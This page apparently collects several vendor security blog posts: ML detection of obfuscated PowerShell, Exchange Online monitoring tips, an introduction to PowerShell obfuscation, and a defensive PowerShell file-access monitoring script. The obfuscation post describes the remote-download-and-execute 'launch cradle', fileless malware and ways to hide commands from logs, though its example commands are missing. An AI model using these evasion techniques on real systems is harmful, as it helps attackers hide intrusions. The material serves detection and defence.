Those dribbles below the main trend show that obfuscated PowerShell has a different character frequency than standard scripts.

In any case, Holmes and his group moved to a more complicated logistical regression model – basically classifying PowerShell code into either evil obfuscated or normal scripts. He then trained his logit by looking deep into PowerShell’s parsing of commands – gathering stats for levels of nesting, etc. – to come up with a respectable classifier with an accuracy of about 96%. Not by any means perfect, but a good start!

A Few More Thoughts

While I give a hat tip to Microsoft for improving their PowerShell logging game, there are still enough holes for attackers to get their scripts run without being detected. And this assumes that IT groups know to enable PowerShell Module logging in the first place!

The machine learning model suggests that it’s possible to  detect these stealthy scripts in the wild.

However, this means we’re back into the business of scanning for malware, and we know that this approach ultimately falls short. You can’t keep up with the attackers who are always changing and adjusting their code to fool the detectors.

Where is this leading? Of course, you turn on PowerShell logging as needed and try to keep your scanning software up to date, but in the end you need to have a solid secondary defense, one based on looking for post-exploitation activities involving file accesses of your sensitive data.

Catch what PowerShell log scanners miss! Request a demo today.

3 Tips to Monitor and Secure Exchange Online

3 Tips to Monitor and Secure Exchange Online

Even if you don’t have your sights on the highest office in the country, keeping a tight leash on your emails is now more important than ever.

Email is commonly targeted by hackers as a method of entry into organizations. No matter if your email is hosted by a 3rd party or managed internally, it is imperative to monitor and secure those systems.

Microsoft Exchange Online – part of Microsoft’s Office365 cloud offering – is just like Exchange on-prem but you don’t have to deal with the servers. Microsoft provides some tools and reports to assist securing and monitoring of Exchange Online like encryption and archival, but it doesn’t cover all the things that keep you up at night like:

  • What happens when a hacker gains access as an owner to an account?
  • What happens if a hacker elevates permissions and makes themselves owner of the CEO’s email?
  • What happens when the hackers have access to make changes to the O365 environment, will you notice?

These questions are exactly what prompted us to develop our layered security approach – which Andy does a great job explaining the major principles of here. What happens when the bad people get in – and they have the ability to change and move around the system? At the end of the day, Exchange Online is another system that provides an attack vector for hackers.

Applying these same principles to Exchange Online, we can extrapolate the following to implement monitoring and security for your email in the cloud:

  1. Lock down access: Make sure only the correct people are owners of mailboxes, and limit access make changes to permissions or 0365 to a small group of administrators.
  2. Manage user access: Archive and delete inactive users immediately. Inactive users are an easy target for hackers as they are usually able to use those accounts without being noticed.
  3. Monitor behavior: Implement a User Based Analytics (UBA) system on top of your email monitoring. Being able to spot abnormal behavior (ie an account being promoted to owner of the CEO’s email folder, another forwarding thousands of emails to the same email address) early is the key to stopping a hacker in hours or days instead of weeks or months.

Wondering if there’s a good solution to help monitor your Exchange Online? Well, we’ve got you covered there too.

PowerShell Obfuscation: Stealth Through Confusion, Part I

PowerShell Obfuscation: Stealth Through Confusion, Part I

This article is part of the series "PowerShell Obfuscation". Check out the rest:

To get into the spirit of this post, you should probably skim through the first few slides of this presentation by Daniel Bohannon and Le Holmes given at Black Hat 2017. Who would have thunk that making PowerShell commands look unreadable would require a triple-digit slide deck?

We know PowerShell is the go to-tool for post-exploitation, allowing attackers to live off the land and prosper. Check out our pen testing Active Directory series for more proof.

However, IT security is, in theory monitoring user activities at, say,  the Security Op. Center or SoC, so it should be easy to spot when a “non-normal” command is being executed.

In fact, we know that one tipoff of a PowerShell attack is when a user creates a  WebClient object,  calls its Downloadstring method, and then executes the string contained in the remote web page. Something like the following:

Why would an ordinary user or even for that matter an admin do this?

While this “clear text” is easy to detect by looking at the right logs in Windows and scanning for the appropriate keywords, the obfuscated version is anything but. At the end of this post, we’ll show how this basic “launch cradle” used by hackers can be made to look a complete undecipherable word jumble.

PowerShell Logging    

Before we take our initial dive into obfuscation, let’s explore how events actually gets logged by Windows, specifically for PowerShell. Once you see the logs, you’ll get a greater appreciation of what hackers are trying to hide.

To their credit, Microsoft has realized the threat possibilities in PowerShell and started improving command logging in Windows 7. You see these improvements in PowerShell versions 4 and 5.

In my own AWS environment, the Windows Server 2012 I used came equipped with version 4. It seems to have most of the advanced logging capabilities — though 5 has the latest and greatest.

From what I was able to grok reading Bohannon’s great presentation and a few other Microsoft sources, you need to enable event 4688 (process creation) and then  turn on auditing for the  PowerShell command line. You can read more about it in this Microsoft document.

And then for even more voluminous logging,  you can set policies in the GPO console to enable, for example, full transcription logging of a PowerShell (below).

More PowerShell logging features in the Administrate Template under Computer Configuration.

No, I didn’t do that for my own testing! I discovered (as many other security pros have) that when using the Windows Event Viewer  things get confusing very quickly. I don’t need the full power of transcription logging.

For kicks I ran a simple pipeline — Get-Process | %{Write-Host $_.Handles}— to print out process handles, and generated … an astonishing 114 events in the PowerShell log. Ofer, by the way, has a good post explaining the larger problem of correlating separate events to understand the full picture.

Got it! The original pipeline that spewed off lots of related events.

The good news is that from the Event Viewer,  I was able to see the base command line that triggered the event cascade (above).

Release the Confusion

The goal of the attacker is to make it very difficult or impossible for security staff viewing the log to detect obvious hacking activity or, more likely, fool analytics software to not trigger when malware is loaded.

In the aforementioned presentation, there’s a long, involved example, showing how to obfuscate malware by exploiting PowerShell’s ability to execute commands embedded in a string.

Did you know this was possible?

Or, at a more evil level, this:

Or take a look at this, which I cooked up based on my own recipe:

Yeah, PowerShell is incredibly flexible and the hackers are good at taking advantage of its features to create confusion.

You can also ponder this one, which uses environment variables in an old-fashioned Windows shell to hide the evil code and then pipe it into PowerShell:

You should keep in mind that in a PowerShell pipeline, each pipe segment runs as a separate process, which spews its own events for maximum log confusion. The goal in the above example is to use the %cmd% variable to hide the evil code.

However, from my Windows Event Viewer,  I was able to spot the full original command line — though it took some digging.

In theory, you could look for the actual malware signature, which in my example is  represented by “write-host evil malware”, within the Windows logs by scanning the command lines.

But hackers became very clever by making the malware signature itself invisible. That’s really the example I first started with.

The idea is to use the WebClient .Net object to read the malware that’s contained on a remote site and then execute it with PowerShell’s Invoke-Expression. In the Event Viewer, you can’t see the actual code!

This is known as fileless malware and has become very popular technique among the hackeratti. As I mentioned in the beginning, security pros can counteract this by looking instead for WebClient and Downloadstring in the command line. It’s just not a normal user command, at least in my book.

A Quick Peek at Invoke-Obfuscation

This is where Bohannon’s Invoke-Obfuscation tool comes into play. He spent a year exploring all kinds of PowerShell command line obfuscation techniques — and he’s got the beard to prove it! —to make it almost impossible to scan for obvious keywords.

His obfuscations are based on escape sequences and clever PowerShell programming to manipulate commands.

I loaded his Invoke-Expression app into my AWS server and tried it out for myself. We’ll explore more of this tool next time, but here’s what happened when I gave it the above Webclient.Downloadstring fileless command string:

Invoke-Obfuscation’s string obfuscation. Hard to search for malware signatures within this jumble.

Very confusing! And I was able to test the obfuscated PowerShell within his app.

Next time we’ll look at more of Invoke-Obfuscation’s powers and touch on new ways to spot these confusing, but highly dangerous, PowerShell scripts.

Continue reading the next post in "PowerShell Obfuscation"

[Podcast] Varonis Director of Cyber Security Ofer Shezaf, Part I

[Podcast] Varonis Director of Cyber Security Ofer Shezaf, Part I

This article is part of the series "[Podcast] Varonis Director of Cyber Security Ofer Shezaf". Check out the rest:

Leave a review for our podcast & we'll send you a pack of infosec cards.


A self-described all-around security guy, Ofer Shezaf is in charge of security standards for Varonis products. He has had a long career that includes most recently a stint at Hewlett-Packard, where he was a product manager for their SIEM software, known as ArcSight. Ofer is a graduate of Israel’s Technion University.

It’s always great to talk to Ofer on data security since his perspective is shaped by a 20-year career. He’s seen it all! In the first part of our interview, we learn how hackers have taken long-standing techniques such as SQL injection and built successful business models around their malware.

Can they be stopped? Ofer thinks we’ll first need to have new metrics and measurements describing the security of developed software. Click on the interview above to hear more about what he has to say.

Continue reading the next post in "[Podcast] Varonis Director of Cyber Security Ofer Shezaf"

Practical PowerShell for IT Security, Part V: Security Scripting Platform ...

Practical PowerShell for IT Security, Part V: Security Scripting Platform Gets a Makeover

A few months ago, I began a mission to prove that PowerShell can be used as a security monitoring tool. I left off with this post, which had PowerShell code to collect file system events, perform some basic analysis, and then present the results in graphical format. My Security Scripting Platform (SSP) may not be a minimally viable product, but it was, I think, useful as simple monitoring tool for a single file directory.

After finishing the project, I knew there were areas for improvement. The event handling was clunky, the passing of information between various parts of the SSP platform was anything but straightforward, and the information being displayed using the very primitive Out-GridViewwas really a glorified table.

New and Improved

I took up the challenge of making SSP a bit more viable. My first task was to streamline event handling. I had initially worked it out so that file event messages were picked up by a handler in my Register-EngineEvent scriptblock and sent to an internal queue and then finally forwarded to the main piece of code, the classification software.

I regained my sanity, and realized I could just directly forward the messages with Register-EngineEvent -forward from within the event handling scriptblock, removing an unnecessary layer of queuing craziness.

You can see the meaner, leaner version below.

#Count events, detect bursts, forward to main interface

$cur = Get-Date
$Global:Count=0
$Global:baseline = @{"Monday" = @(1,1,1); "Tuesday" = @(1,.5,1);"Wednesday" = @(4,4,4);"Thursday" = @(7,12,4); "Friday" = @(5,4,6); "Saturday"=@(2,1,1); "Sunday"= @(2,4,2)}
$Global:cnts =     @(0,0,0)
$Global:burst =    $false
$Global:evarray =  New-Object System.Collections.ArrayList

$action = { 
    $Global:Count++  
    $d=(Get-Date).DayofWeek
    $i= [math]::floor((Get-Date).Hour/8) 

   $Global:cnts[$i]++ 
   

   #event auditing!
    
   $rawtime =  $EventArgs.NewEvent.TargetInstance.LastAccessed.Substring(8,6)
   $filename = $EventArgs.NewEvent.TargetInstance.Name
   $etime= [datetime]::ParseExact($rawtime,"HHmmss",$null)
  

   $msg="$($etime)): Access of file $($filename)"
   $msg|Out-File C:\Users\Administrator\Documents\events.log -Append
  
   New-Event -SourceIdentifier Delta -MessageData "Access" -EventArguments $filename  #notify 
   
   $Global:evarray.Add(@($filename,$etime))
   if(!$Global:burst) {
      $Global:start=$etime
      $Global:burst=$true            
   }
   else { 
     if($Global:start.AddMinutes(15) -gt $etime ) { 
        $Global:Count++
        #File behavior analytics
        $sfactor=2*[math]::sqrt( $Global:baseline["$($d)"][$i])
       
        if ($Global:Count -gt $Global:baseline["$($d)"][$i] + 2*$sfactor) {  #at 95% level of poisson
         
         
          "$($etime): Burst of $($Global:Count) accesses"| Out-File C:\Users\Administrator\Documents\events.log -Append 
          $Global:Count=0
          $Global:burst =$false
          New-Event -SourceIdentifier Delta -MessageData "Burst" -EventArguments $Global:evarray #notify on burst
          
          $Global:evarray= [System.Collections.ArrayList] @()
        }
     }
     else { $Global:burst =$false; $Global:Count=0; $Global:evarray= [System.Collections.ArrayList]  @()}
   }     
} 

Register-EngineEvent -SourceIdentifier Delta -Forward 
Register-WmiEvent -Query "SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance ISA 'CIM_DataFile' and TargetInstance.Path = '\\Users\\Administrator\\' and targetInstance.Drive = 'C:' and (targetInstance.Extension = 'txt' or targetInstance.Extension = 'doc' or targetInstance.Extension = 'rtf') and targetInstance.LastAccessed > '$($cur)' " -sourceIdentifier "Accessor" -Action $action   
Write-Host "starting engine ..."

while ($true) {

   Wait-Event -SourceIdentifier Access # just hang on this so I don't exit    
  
}

 

Then I took on the main piece of code, where I classify files based on whether they have social security numbers and other sensitive keywords. As events come in from the handler, the file reclassification is triggered. This code then periodically displays some of the results of the classification.

In this latest version, I removed the “real-time” classification and focused on cleaning up the PowerShell code and improving the graphics — more on that below.

I took a wrong turn in the original version by relying on a PowerShell data locking module to synchronize data access from concurrent tasks, which I used for some of the grunt work. On further testing, the freebie module that implements the Lock-Object cmdlet didn’t seem to work.

As every junior system programmer knows, it’s easier to synchronize with messages than with low-level locks. I reworked the code to take the messages from the event handler above, and send them directly to a main message processing loop. In short: I was able to deal with asynchronous events in a synchronous manner.

.Net Framework Charts and PowerShell

My great discovery in the last month was that I could embed Microsoft-style charts inside PowerShell. In other word, the bar, line, scatter and other charts that are available in Excel and Word can be controlled programmatically in PowerShell. As a newbie PowerShell programmer, this was exciting to me. You can read more about .Net Framework Controls in this post.

It’s a great idea, and it meant I could also replace the messy Out-GridViewcode.

But the problem, I quickly learned, is that you also have to deal with some of the interactive programming involved with Microsoft forms. I just wanted to display my .Net charts while not having to code the low-level details. Is there a lazy way out?

After much struggle, I came to see that the easiest way to do this is to launch each chart in its own runspace as a separate task. (Nerd Note: this is how I avoided coding message handling for all the charts since each runs separately as modal dialogs.)

I also benefited from this freebie PowerShell module that wraps the messy .Net chart controls. Thanks Marius!

I already had set up a tasking system earlier to scan and classify each file in the directory I was monitoring, so it was just a matter of reusing this tasking code to launch graphs.

I created a pie chart for showing relative concentration of sensitive data, a bar chart for a breakdown of files by sensitive data types, and, the one I’m most proud is a classic event stair-step chart for file access burst conditions — a possible sign of an attack.

My amazing dashboard. Not bad for PowerShell with .Net charts.

For those who are curious about the main chunk of code doing all the work of my SSP, here it is for your entertainment:

 
$scan = {  #file content scanner
$name=$args[0]
function scan {
   Param (
      [parameter(position=1)]
      [string] $Name
   )
      $classify =@{"Top Secret"=[regex]'[tT]op [sS]ecret'; "Sensitive"=[regex]'([Cc]onfidential)|([sS]nowflake)'; "Numbers"=[regex]'[0-9]{3}-[0-9]{2}-[0-9]{3}' }
     
      $data = Get-Content $Name
      
      $cnts= @()
      
      if($data.Length -eq 0) { return $cnts} 
      
      foreach ($key in $classify.Keys) {
       
        $m=$classify[$key].matches($data)           
           
        if($m.Count -gt 0) {
           $cnts+= @($key,$m.Count)  
        }
      }   
 $cnts   
}
scan $name
}




#launch a .net chart 
function nchart ($r, $d, $t,$g,$a) {

$task= {
Param($d,$t,$g,$a)

Import-Module C:\Users\Administrator\Documents\charts.psm1
$chart = New-Chart -Dataset $d -Title $t -Type $g -Axis $a
Show-Chart $chart

}
$Task = [powershell]::Create().AddScript($task).AddArgument($d).AddArgument($t).AddArgument($g).AddArgument($a)
$Task.RunspacePool = $r
$Task.BeginInvoke()

}

Register-EngineEvent -SourceIdentifier Delta -Action {
      
      if($event.MessageData -eq "Burst") { #just look at bursts
        New-Event -SourceIdentifier File -MessageData $event.MessageData -EventArguments $event.SourceArgs 
      }
      
      
      Remove-Event -SourceIdentifier Delta
}




$list=Get-WmiObject -Query "SELECT * From CIM_DataFile where Path = '\\Users\\Administrator\\' and Drive = 'C:' and (Extension = 'txt' or Extension = 'doc' or Extension = 'rtf')"  


#long list --let's multithread

#runspace
$RunspacePool = [RunspaceFactory]::CreateRunspacePool(1,5)
$RunspacePool.Open()
$Tasks = @()




foreach ($item in $list) {
  
  $Task = [powershell]::Create().AddScript($scan).AddArgument($item.Name)
  $Task.RunspacePool = $RunspacePool
  
  $status= $Task.BeginInvoke()
  $Tasks += @($status,$Task,$item.Name)
}




#wait
while ($Tasks.isCompleted -contains $false){
  
}


#Analytics, count number of sensitive content for each file
$obj = @{}
$tdcnt=0
$sfcnt=0
$nfcnt=0


for ($i=0; $i -lt $Tasks.Count; $i=$i+3) {
   $match=$Tasks[$i+1].EndInvoke($Tasks[$i]) 
  
   if ($match.Count -gt 0) {   
      $s = ([string]$Tasks[$i+2]).LastIndexOf("\")+1
      
      $obj.Add($Tasks[$i+2].Substring($s),$match)
       for( $j=0; $j -lt $match.Count; $j=$j+2) {      
         switch -wildcard ($match[$j]) {
             'Top*'  { $tdcnt+= 1 }
                      
             'Sens*' { $sfcnt+= 1}                      
                      
             'Numb*' { $nfcnt+=1} 
                                              
      }         
            
       }
   }    
   $Tasks[$i+1].Dispose()
   
}


#Display Initial Dashboard
#Pie chart of sensitive files based on total counts of senstive dat
$piedata= @{}
foreach ( $key in $obj.Keys) {
   $senscnt =0
   for($k=1; $k -lt $obj[$key].Count;$k=$k+2) {
     $senscnt+= $obj[$key][$k]

   }
   $piedata.Add($key, $senscnt) 

}


nchart $RunspacePool $piedata "Files with Sensitive Content" "Pie" $false

#Bar Chart of Total Files, Sensitive  vs Total
$bardata = @{"Total Files" = $Tasks.Count}
$bardata.Add("Files w. Top Secret",$tdcnt)
$bardata.Add("Files w. Sensitive", $sfcnt)
$bardata.Add("Files w. SS Numbers",$nfcnt)


nchart $RunspacePool $bardata "Sensitive Files" "Bar" $false


#run event handler as a seperate job
Start-Job -Name EventHandler -ScriptBlock({C:\Users\Administrator\Documents\evhandler.ps1})


while ($true) { #main message handling loop
   
       [System.Management.Automation.PSEventArgs] $args = Wait-Event -SourceIdentifier File  # wait on event
        Remove-Event -SourceIdentifier File
        #Write-Host $args.SourceArgs      
        if ($args.MessageData -eq "Burst") {
        #Display Bursty event
         $dt=$args.SourceArgs
         #time in seconds
         [datetime]$sevent =$dt[0][1]
         
         $xyarray = [ordered]@{}
         $xyarray.Add(0,1)
         for($j=1;$j -lt $dt.Count;$j=$j+1) {
               [timespan]$diff = $dt[$j][1] - $sevent
               $xyarray.Add($diff.Seconds,$j+1) 
          }
          nchart $RunspacePool $xyarray "Burst Event" "StepLine" $true 
        }        
        
   
}#while

Write-Host "Done!"

 

Lessons Learned

Of course, with any mission the point is the journey not the actual goal, right? The key thing I learned is that you can use PowerShell to do security monitoring. For a single directory, on a small system. And only using it sparingly.

While I plan on improving what I just presented by adding real-time graphics, I’m under no illusion that my final software would be anything more than a toy project.

File event monitoring, analysis, and graphical display of information for an entire system is very, very hard to do on your own. You can, perhaps, recode my solution using C++, but you’ll still have to deal with the lags and hiccups of processing low-level events in the application space. To do this right, you need to have hooks deep in the OS — for starters — and then do far more serious analysis of file events than is performed in my primitive analytics code. That ain’t easy!

I usually end up these DIY posts by saying “you know where this is going.” I won’t disappoint you.

You know where this is going. Our own enterprise-class solution is a true data security platform or DSP – it handles classification, analytics, threat detection, and more for entire IT systems.

By all means, try to roll your own, perhaps based on this project, to learn the difficulties and appreciate what a DSP is actually doing.

Have questions? Feel free to contact us!

Next Steps

If you’re interested in learning more practical, security focused PowerShell, you can unlock the full 3 hour video course on PowerShell and Active Directory Essentials with the code cmdlet.